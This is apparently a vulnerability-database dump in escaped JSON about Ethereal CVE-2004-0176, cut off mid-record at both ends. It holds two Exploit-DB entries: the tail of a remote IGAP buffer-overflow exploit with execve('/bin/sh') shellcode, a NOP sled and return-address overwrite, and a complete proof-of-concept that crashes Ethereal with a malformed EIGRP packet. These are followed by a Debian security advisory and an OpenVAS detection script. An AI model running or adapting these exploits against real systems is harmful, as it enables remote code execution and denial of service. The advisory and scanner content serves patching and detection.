\"\\x31\\xc9\" // xorl %ecx,%ecx\r\n \"\\xb0\\x3f\" // movb $0x3f,%al\r\n \"\\xcd\\x80\" // int $0x80\r\n \"\\x41\" // incl %ecx\r\n \"\\x80\\xf9\\x03\" // cmpb $0x3,%cl\r\n \"\\x75\\xf6\" // jne -0xa\r\n \r\n /* execve() */\r\n \"\\x31\\xd2\" // xorl %edx,%edx\r\n \"\\x52\" // pushl %edx\r\n \"\\x68\\x6e\\x2f\\x73\\x68\" // pushl $0x68732f6e\r\n \"\\x68\\x2f\\x2f\\x62\\x69\" // pushl $0x69622f2f\r\n \"\\x89\\xe3\" // movl %esp,%ebx\r\n \"\\x52\" // pushl %edx\r\n \"\\x53\" // pushl %ebx\r\n \"\\x89\\xe1\" // movl %esp,%ecx\r\n \"\\xb0\\x0b\" // movb $0xb,%al\r\n \"\\xcd\\x80\"; // int $0x80\r\n \r\nstruct ipheader {\r\n\tunsigned char ip_hl:4, ip_v:4; \r\n\tunsigned char ip_tos;\r\n\tunsigned short int ip_len;\r\n\tunsigned short int ip_id;\r\n\tunsigned short int ip_off;\r\n\tunsigned char ip_ttl;\r\n\tunsigned char ip_proto;\r\n\tunsigned short int ip_sum;\r\n\tunsigned int ip_src;\r\n\tunsigned int ip_dst;\r\n};\r\n\r\nstruct igap_header { \t\t// This is a malformed header which does not conforms with IGAP RFC\r\n\tunsigned char igap_type; \t// Message Type\r\n\tunsigned char igap_restime; \t// Response Time\r\n\tunsigned short int igap_cksum; \t// IGAP Message Checksum\r\n\tunsigned int igap_gaddr; \t// Group Address\r\n\tunsigned char igap_ver; \t// Version\r\n\tunsigned char igap_stype;\t// SubType\r\n\tunsigned char igap_reserved1;\t// Reserved\r\n\tunsigned char igap_cid;\t\t// Challenge ID\r\n\tunsigned char igap_asize;\t// Account Size\r\n\tunsigned char igap_msgsize;\t// Message Size\r\n\tunsigned short int igap_reserved2;\t// Reserved\r\n\t/*\r\n\tunsigned char igap_uaccount[16];// User Account\r\n\tunsigned char igap_message[64]\t// Message\r\n\t*/\r\n\tunsigned char igap_payload[16+64+PAYLOAD_SIZE];\t\r\n// This buffer will contain payload, here we differ from RFC by sending a bigger message.\r\n};\r\n\r\nunsigned short checksum(unsigned short *buf,int nwords)\r\n{\r\n\tunsigned long sum;\r\n\tfor (sum = 0; nwords > 0; nwords--)\r\n\t\tsum += *(buf)++;\r\n\tsum = (sum >> 16) + (sum & 0xffff);\r\n\tsum += (sum >> 16);\r\n\treturn ~sum;\r\n}\r\n\r\nvoid showhelp(char *pr00gie) {\r\n\tint i=0;\r\n\tprintf(\"######### The Eye on Security Research Group - India ########\\n\");\r\n\tprintf(\"%s %s\\n\",EXP,VER);\r\n \tprintf(\"abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\\n\");\r\n \tprintf(\"http://www.eos-india.net\\n\\n\");\r\n\tprintf(\"[usage]\\n\");\r\n\tprintf(\"%s [Remote Host] [Target]\\n\",pr00gie);\r\n\tprintf(\"[Available Targets]\\n\");\r\n\twhile(targets[i].arch != NULL) {\r\n\t\tprintf(\"%d. - %s\\t - %p\\n\",(i),targets[i].arch,targets[i].ret);\r\n\t\ti++;\r\n\t}\r\n\texit(1); \r\n}\r\n\t \r\nint main(int argc,char *argv[]) {\r\n\tchar buffer[MAX_BUFF];\r\n\tstruct ipheader *iphdr=(struct ipheader*)buffer;\r\n\tstruct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));\r\n\tint sockfd;\r\n\tunsigned long addr;\r\n\tint one=1;\r\n\tint i;\r\n\tconst int *val=&one;\r\n\tstruct sockaddr_in sin;\r\n\tunsigned long magic;\r\n\tunsigned int n;\r\n\t\r\n\tif(getuid()) {\r\n\t\tprintf(\"- This code opens SOCK_RAW which needs root privilege\\n\");\r\n\t\texit(1);\r\n\t}\r\n\tif(argc != 3)\r\n\t\tshowhelp(argv[0]);\r\n\tn=atoi(argv[2]);\r\n\tif(n >= MAX_ARCH) {\r\n\t\tprintf(\"- Invalid target\\n\");\r\n\t\tshowhelp(argv[0]);\r\n\t}\r\n\tmagic=targets[n].ret;\r\n\tprintf(\"-Using RET %p\\n\",magic);\r\n\taddr=inet_addr(argv[1]);\r\n\tif(addr==INADDR_NONE) {\r\n\t\tprintf(\"- Invalid target\\n\");\r\n\t\texit(1);\r\n\t}\r\n\tsin.sin_addr.s_addr=addr;\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=0x00;\r\n\tsockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);\r\n\tif(sockfd==SOCKET_ERROR) {\r\n\t\tprintf(\"- Failed creating SOCK_RAW descriptor\\n\");\r\n\t\texit(1);\r\n\t}\r\n\tif(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)\r\n\t\tprintf (\"- WARNING !! :Cannot set IP_HDRINCL!\\n\");\r\n\tmemset(buffer,0x00,MAX_BUFF);\r\n\t// Filling IP Header\r\n\tiphdr->ip_hl=0x05;\r\n\tiphdr->ip_v=0x04;\r\n\tiphdr->ip_tos=0x00;\r\n\tiphdr->ip_len=MAX_BUFF;\r\n\tiphdr->ip_id=htonl(54321);\r\n\tiphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset\r\n\tiphdr->ip_ttl=0x01;\r\n\tiphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP\r\n\tiphdr->ip_sum=0x00; // Fill sum before sending packet\r\n\tiphdr->ip_src=inet_addr (SRC_IP); \r\n\tiphdr->ip_dst=addr;\r\n\t// Filling IGAP Header\r\n\tigaphdr->igap_type=0x41; // IGAP Membership Query\r\n\tigaphdr->igap_restime=0x0a; // \r\n\tigaphdr->igap_cksum=0x00; // compute before sending packet\r\n\tigaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message\r\n\tigaphdr->igap_ver=0x01; // IGAPv1\r\n\tigaphdr->igap_stype=0x21; // Basic Query\r\n\tigaphdr->igap_reserved1=0x00; // Ignored\r\n\tigaphdr->igap_cid=0x00; \r\n\t// Challenge ID (ignored because Chanllenge Response authentication not used)\t\t\r\n\tigaphdr->igap_asize=0x10; // MAX Size of Account Name Field\r\n\tigaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message\t\r\n\tigaphdr->igap_reserved2=0x00; // Reserved\r\n\t// Building exploit buffer\r\n\t//for(i=0;i<16+64+PAYLOAD_SIZE;i++)\r\n\t//\tmemset(igaphdr->igap_payload+i,(unsigned char)i,1);\r\n\tmemset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);\r\n\tmemcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,\r\n\tstrlen(shellcode_firsthalf));\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);\r\n\tmagic-=0x10;\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);\r\n\tmemcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,\r\n shellcode_secondhalf,strlen(shellcode_secondhalf));\r\n\t// Calculating checksum\r\n\tigaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),\r\n\t(sizeof(struct igap_header))>>1);\r\n\tiphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);\r\n\t// Sending\r\n\tone=MAX_PACKET;\r\n\twhile(one) {\r\n\t\tsendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));\r\n\t\tprintf(\".\");\r\n\t\tone--;\r\n\t}\r\n\tclose(sockfd); \r\n\tprintf(\"\\n- Send %d packets to %s\\n\",MAX_PACKET,argv[1]);\t\r\n\tprintf(\"- Read source to know what to do to check if the exploit worked\\n\");\r\n\treturn 0;\r\n}\n\n// milw0rm.com [2004-03-28]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/167/"}, {"lastseen": "2016-01-31T11:51:30", "osvdbidlist": ["6889"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit. CVE-2004-0176. Dos exploits for multiple platform", "reporter": "R\u00e9mi Denis-Courmont", "published": "2004-03-26T00:00:00", "type": "exploitdb", "title": "Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0176"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2004-03-26T00:00:00", "id": "EDB-ID:170", "href": "https://www.exploit-db.com/exploits/170/", "sourceData": "/*\r\n * Ethereal network protocol analyzer\r\n * EIGRP Dissector TLV_IP_INT Long IP Address Overflow\r\n * vulnerability\r\n * proof of concept code\r\n * version 1.0 (Mar 26 2004)\r\n *\r\n * by R�mi Denis-Courmont < ethereal at simphalampin dot com >\r\n * www simphalempin com dev \r\n *\r\n * This vulnerability was found by:\r\n * Stefan Esser s.esser e-matters de\r\n * whose original advisory may be fetched from:\r\n * security e-matters de advisories 032004.html\r\n *\r\n * Vulnerable:\r\n * - Ethereal v0.10.2\r\n *\r\n * Not vulnerable:\r\n * - Ethreal v0.10.3\r\n *\r\n * Note: this code will simply trigger a denial of service on Ethereal.\r\n * It should really be possible to exploit the buffer overflow\r\n * (apparently up to 29 bytes overflow), but I haven't tried.\r\n */\r\n\r\n\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/ip.h>\r\n#include <netdb.h>\r\n\r\nstatic const char packet[] =\r\n \"\\x01\" /* Version */\r\n \"\\x04\" /* Opcode: Reply */\r\n \"\\x00\\x00\" /* Checksum (invalid) */\r\n \"\\x00\\x00\\x00\\x00\" /* Flags */\r\n \"\\x00\\x00\\x00\\x00\" /* Sequence number */\r\n \"\\x00\\x00\\x00\\x00\" /* ACK */\r\n \"\\x00\\x00\\x00\\x00\" /* AS number */\r\n\r\n /* IP internal routes TLV */\r\n \"\\x01\\x02\" /* Type */\r\n \"\\x00\\x39\" /* Length (should be 0x1C) */\r\n \"\\x00\\x00\\x00\\x00\" /* Next hop */\r\n \"\\x00\\x00\\x00\\x00\" /* Delay */\r\n \"\\x00\\x00\\x00\\x00\" /* Bandwitdh */\r\n \"\\x00\\x00\\x00\" /* MTU */\r\n \"\\x00\" /* Hop count: directly connected */\r\n \"\\xff\" /* Reliability: maximum */\r\n \"\\x01\" /* Load: minimum */\r\n \"\\x00\\x00\" /* Reserved */\r\n \"\\xff\" /* Prefix length: should be > 0 and <= 32 */\r\n \"\\x00\\x00\\x00\" /* Destination network */\r\n \"\\xff\\xff\\xff\\xff\" \"\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\" \"\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\" \"\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\" \"\\xff\" /* buffer overflow */\r\n;\r\n\r\n\r\nstatic int\r\nproof (const struct sockaddr_in *dest)\r\n{\r\n int fd;\r\n size_t len;\r\n\r\n fd = socket (PF_INET, SOCK_RAW, 88);\r\n if (fd == -1)\r\n {\r\n perror (\"Raw socket error\");\r\n return 1;\r\n }\r\n\r\n len = sizeof (packet) - 1;\r\n if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,\r\n sizeof (struct sockaddr_in)) != len)\r\n {\r\n perror (\"Packet sending error\");\r\n close (fd);\r\n return 1;\r\n }\r\n\r\n puts (\"Packet sent!\");\r\n close (fd);\r\n return 0;\r\n}\r\n\r\n\r\nstatic int\r\nusage (const char *path)\r\n{\r\n fprintf (stderr, \"Usage: %s <hostname/IP>\\n\", path);\r\n return 2;\r\n}\r\n\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n struct sockaddr *dest;\r\n\r\n puts (\"Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflow\\n\"\r\n \"proof of concept code\\n\"\r\n \"Copyright (C) 2004 R<E9>mi Denis-Courmont \"\r\n \"<\\x65\\x74\\x68\\x65\\x72\\x65\\x61\\x6c\\x40\\x73\\x69\\x6d\\x70\"\r\n \"\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n\");\r\n\r\n\r\n if (argc != 2)\r\n return usage (argv[0]);\r\n else\r\n {\r\n struct addrinfo help, *res;\r\n int check;\r\n\r\n memset (&help, 0, sizeof (help));\r\n help.ai_family = PF_INET;\r\n\r\n check = getaddrinfo (argv[1], NULL, &help, &res);\r\n if (check)\r\n {\r\n fprintf (stderr, \"%s: %s\\n\", argv[1],\r\n gai_strerror (check));\r\n return 1;\r\n }\r\n\r\n dest = res->ai_addr;\r\n }\r\n\r\n return proof ((const struct sockaddr_in *)dest);\r\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/170/"}], "debian": [{"lastseen": "2018-10-16T22:14:20", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "0.9.4-1woody7", "arch": "all", "packageFilename": "ethereal-dev_0.9.4-1woody7_all.deb", "packageName": "ethereal-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "0.9.4-1woody7", "arch": "all", "packageFilename": "tethereal_0.9.4-1woody7_all.deb", "packageName": "tethereal", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "0.9.4-1woody7", "arch": "all", "packageFilename": "ethereal_0.9.4-1woody7_all.deb", "packageName": "ethereal", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3", "packageVersion": "0.9.4-1woody7", "arch": "all", "packageFilename": "ethereal-common_0.9.4-1woody7_all.deb", "packageName": "ethereal-common", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 511-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nMay 30th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : ethereal\nVulnerability : buffer overflows\nProblem-Type : remote\nDebian-specific: no\nCVE Ids : CAN-2004-0176 \n\nSeveral buffer overflow vulnerabilities were discovered in ethereal, a\nnetwork traffic analyzer. These vulnerabilites are described in the\nethereal advisory "enpa-sa-00013". Of these, only some parts of\nCAN-2004-0176 affect the version of ethereal in Debian woody.\nCAN-2004-0367 and CAN-2004-0365 are not applicable to this version.\n\nFor the current stable distribution (woody), these problems have been\nfixed in version 0.9.4-1woody7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 0.10.3-1.\n\nWe recommend that you update your ethereal package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7.dsc\n Size/MD5 checksum: 679 323c90392539e2da1279f17f6decf771\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7.diff.gz\n Size/MD5 checksum: 45483 0004ee73d2b90d02661745d3312b08e3\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4.orig.tar.gz\n Size/MD5 checksum: 3278908 42e999daa659820ee93aaaa39ea1e9ea\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_alpha.deb\n Size/MD5 checksum: 1941020 d79e6c8e1457cfb06c76baf19e6b5b7d\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_alpha.deb\n Size/MD5 checksum: 334382 ac866af4b9479c44c3d4d84488bde94c\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_alpha.deb\n Size/MD5 checksum: 222246 1ee88001668518dea6abdb02e7cbe55a\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_alpha.deb\n Size/MD5 checksum: 1707506 02752471daed08c9df975e9f415ac4e0\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_arm.deb\n Size/MD5 checksum: 1635334 4adb4b8cc07457a945f1b2eeb97f6690\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_arm.deb\n Size/MD5 checksum: 297540 d7ac6d332bfef2e152337529cb83ceee\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_arm.deb\n Size/MD5 checksum: 206166 cb3005dc622ad56e73ba2dce5a53c63b\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_arm.deb\n Size/MD5 checksum: 1439432 704ee53390010698221ae05188fb6ae6\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_i386.deb\n Size/MD5 checksum: 1513010 7e6ba57850ffa13e38b7b8b2cd273e58\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_i386.deb\n Size/MD5 checksum: 285086 c9a7fa9eaa2eab45af8172bbfc23a070\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_i386.deb\n Size/MD5 checksum: 199306 0ea83e3dee4fa81599444cd5091d51a5\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_i386.deb\n Size/MD5 checksum: 1326436 aa569b225bd0d0e67368a73d65e29cc9\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_ia64.deb\n Size/MD5 checksum: 2150400 f6f32ff9881157387367660faf2b21ab\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_ia64.deb\n Size/MD5 checksum: 373176 fde622e2a2d698e8fb0d88793cf1e8d0\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_ia64.deb\n Size/MD5 checksum: 233810 a95f6ed4e1e8fe3d9d0c2f9d882dab0f\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_ia64.deb\n Size/MD5 checksum: 1861656 7846c3569c7d206aff1f1f08886673d0\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_hppa.deb\n Size/MD5 checksum: 1804472 82765f65ed7430e76fb9d7f9dee0fe6a\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_hppa.deb\n Size/MD5 checksum: 322514 af524dc1735491c3b840420a9cbc0c8d\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_hppa.deb\n Size/MD5 checksum: 216956 42ca7e3e8b5c79fdd0072b9aba4bd9fe\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_hppa.deb\n Size/MD5 checksum: 1575904 a74cfa5c06002a4fd9020144b475f72d\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_m68k.deb\n Size/MD5 checksum: 1424618 14a7fd43db721c403a918ec8303e6dcf\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_m68k.deb\n Size/MD5 checksum: 282804 591da6c2f59875d83c41298a02f13f1c\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_m68k.deb\n Size/MD5 checksum: 195206 0778bfba89f9a2f5584c72c28f8c7da3\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_m68k.deb\n Size/MD5 checksum: 1248686 9fc38a5b59118f8c4f13ffd8a9b9885f\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_mips.deb\n Size/MD5 checksum: 1617004 433296ba229444a3deb419d2f50708c9\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_mips.deb\n Size/MD5 checksum: 305342 79d872e63c188f938822a0d61f48a992\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_mips.deb\n Size/MD5 checksum: 213752 d31a8bf923fa2b34a4aabe28b3db101c\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_mips.deb\n Size/MD5 checksum: 1421942 e2ebe374ac6766a309c7d8b79269892a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_mipsel.deb\n Size/MD5 checksum: 1597816 80474ae115e5c4c8cfb00f341570850f\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_mipsel.deb\n Size/MD5 checksum: 304826 50dc977f60d8dad848f19093f5ecab6e\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_mipsel.deb\n Size/MD5 checksum: 213370 c43657991fc0a7297640550c40b196c7\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_mipsel.deb\n Size/MD5 checksum: 1406348 73e84895bcc86352df38fb7bf4fe648a\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_powerpc.deb\n Size/MD5 checksum: 1618208 f2f27be2f0ce2430d8ce41eeab19b9b9\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_powerpc.deb\n Size/MD5 checksum: 302004 f6e1cef517f5ab9fa455c277e9262a22\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_powerpc.deb\n Size/MD5 checksum: 208972 965e842a91a01195a86ef41a8f9ecbaa\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_powerpc.deb\n Size/MD5 checksum: 1419068 aa1cf1b5394f307ca154563a4d95087b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_s390.deb\n Size/MD5 checksum: 1574614 e0df6a629ac38a3c9f651eefaac6395c\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_s390.deb\n Size/MD5 checksum: 300822 1b6b348837db92604c262bd436caae50\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_s390.deb\n Size/MD5 checksum: 204054 0fc3dc9ec73c7c72f24c992424553069\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_s390.deb\n Size/MD5 checksum: 1387334 f42f341c609cfa7c5a46bbc3c7c98bfe\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody7_sparc.deb\n Size/MD5 checksum: 1583320 14e73331296d5be03036e93c1e792fa7\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody7_sparc.deb\n Size/MD5 checksum: 318104 be2b5daaf45a1dd699273abd9ed2ed15\n http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody7_sparc.deb\n Size/MD5 checksum: 204810 a163c33d0e73df9956f9e8467bb5fbb2\n http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody7_sparc.deb\n Size/MD5 checksum: 1389412 1997cf66066552f8e2ddd543ef060115\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2004-05-30T00:00:00", "title": "[SECURITY] [DSA 511-1] New ethereal packages fix buffer overflows", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:20", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2004-05-30T00:00:00", "id": "DEBIAN:DSA-511-1:137EE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00111.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-10-30T10:46:24", "references": [], "pluginID": "53201", "description": "The remote host is missing an update to ethereal\nannounced via advisory DSA 511-1.", "edition": 3, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 511-1 (ethereal)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2017-10-26T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53201", "id": "OPENVAS:53201", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_511_1.nasl 7585 2017-10-26 15:03:01Z cfischer $\n# Description: Auto-generated from advisory DSA 511-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several buffer overflow vulnerabilities were discovered in ethereal, a\nnetwork traffic analyzer. These vulnerabilities are described in the\nethereal advisory enpa-sa-00013. Of these, only some parts of\nCVE-2004-0176 affect the version of ethereal in Debian woody.\nCVE-2004-0367 and CVE-2004-0365 are not applicable to this version.\n\nFor the current stable distribution (woody), these problems have been\nfixed in version 0.9.4-1woody7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 0.10.3-1.\n\nWe recommend that you update your ethereal package.\";\ntag_summary = \"The remote host is missing an update to ethereal\nannounced via advisory DSA 511-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20511-1\";\n\nif(description)\n{\n script_id(53201);\n script_version(\"$Revision: 7585 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 17:03:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0367\", \"CVE-2004-0365\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 511-1 (ethereal)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ethereal\", ver:\"0.9.4-1woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ethereal-common\", ver:\"0.9.4-1woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ethereal-dev\", ver:\"0.9.4-1woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tethereal\", ver:\"0.9.4-1woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:53", "references": [], "pluginID": "54532", "description": "The remote host is missing updates announced in\nadvisory 